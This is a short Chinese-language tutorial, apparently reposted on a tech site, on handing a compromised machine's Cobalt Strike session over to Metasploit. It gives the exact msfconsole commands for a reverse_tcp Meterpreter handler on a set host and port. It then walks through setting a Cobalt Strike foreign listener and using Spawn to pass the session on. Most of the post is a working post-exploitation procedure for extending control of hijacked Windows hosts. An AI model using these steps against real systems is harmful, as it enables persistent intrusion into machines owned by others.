msf+cobaltstrike聯動(二):把cs中的機器spwan給msf


前提:CS已經獲取到session,可以進入圖形化管理機器,現在需要使用msf進行進一步滲透,需要msf的metepreter。 開啟msf

 

msf設置監聽 

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.3.117
lhost => 192.168.3.117
msf exploit(handler) > set lport 2222
lport =>2222
msf exploit(handler) > exploit

 

 

在CS上開啟監聽,設置payload為windows/foreign/reverse_tcp host為msf的host port為msf的監聽端口

 

在控制機器上右鍵選擇Spawn

 

 

選擇Spwan之后會需要選擇一個監聽,選擇剛創建的msf的監聽

 

 

可以看到msf已經接收到cs上spwan過來的session

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM